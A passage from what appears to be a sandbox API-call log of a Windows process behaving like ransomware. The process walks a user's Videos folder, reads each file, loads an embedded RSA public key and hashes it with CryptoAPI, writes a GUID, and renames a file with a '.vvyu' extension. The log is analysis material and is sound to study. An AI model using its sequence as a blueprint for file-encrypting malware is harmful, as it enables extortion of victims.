(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.481] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.481] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.481] CloseHandle (hObject=0x52c) returned 1 [0198.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d47790 [0198.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0198.483] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\VHfBb-wQEn1 mz0zc.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\vhfbb-wqen1 mz0zc.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\VHfBb-wQEn1 mz0zc.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\vhfbb-wqen1 mz0zc.swf.vvyu")) returned 1 [0198.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.485] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.487] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db227a0, ftCreationTime.dwHighDateTime=0x1d8a5e1, ftLastAccessTime.dwLowDateTime=0x95f6a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a690, ftLastWriteTime.dwLowDateTime=0x95f6a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a690, nFileSizeHigh=0x0, nFileSizeLow=0x305c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WE9tZKhSpB.mp4", cAlternateFileName="WE9TZK~1.MP4")) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0198.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.488] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\WE9tZKhSpB.mp4") returned=".mp4" [0198.488] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\WE9tZKhSpB.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\we9tzkhspb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.489] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=12380) returned 1 [0198.489] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.492] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x3036, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.492] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.495] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.495] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x305c, lpOverlapped=0x0) returned 1 [0198.495] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.496] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0198.497] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.497] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.497] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.497] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.497] GetLastError () returned 0x0 [0198.497] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.497] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0198.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.498] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.498] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.498] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3060) returned 0x2d51778 [0198.498] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d790 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d7d8 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a600 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.499] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a600 | out: hHeap=0x6a0000) returned 1 [0198.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a600 [0198.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0198.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5b8 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a5a0 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bfe0 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a600 | out: hHeap=0x6a0000) returned 1 [0198.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.503] GetCurrentThreadId () returned 0x264 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c630 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.504] GetCurrentThreadId () returned 0x264 [0198.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a600 [0198.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5b8 [0198.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a618 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5e8 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5d0 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a630 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5d0 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a600 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a630 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0198.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a618 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d7d8 | out: hHeap=0x6a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 